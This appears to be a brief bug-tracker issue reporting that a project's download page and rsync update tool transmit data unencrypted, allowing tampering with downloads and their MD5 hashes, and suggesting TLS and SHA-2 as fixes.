Downloads and updates transmitted insecurely
The download page and the rsync update tool both transmit data over unencrypted connections. This allows an attacker to inject malicious code into the download, as well as re-write the MD5 hash to hide any malicious activity.
For new downloads, the simplest solution would probably be to put the download page behind TLS and start using sha2 instead of md5. I'm not sure what the "proper" fix for the rsync update tool is though.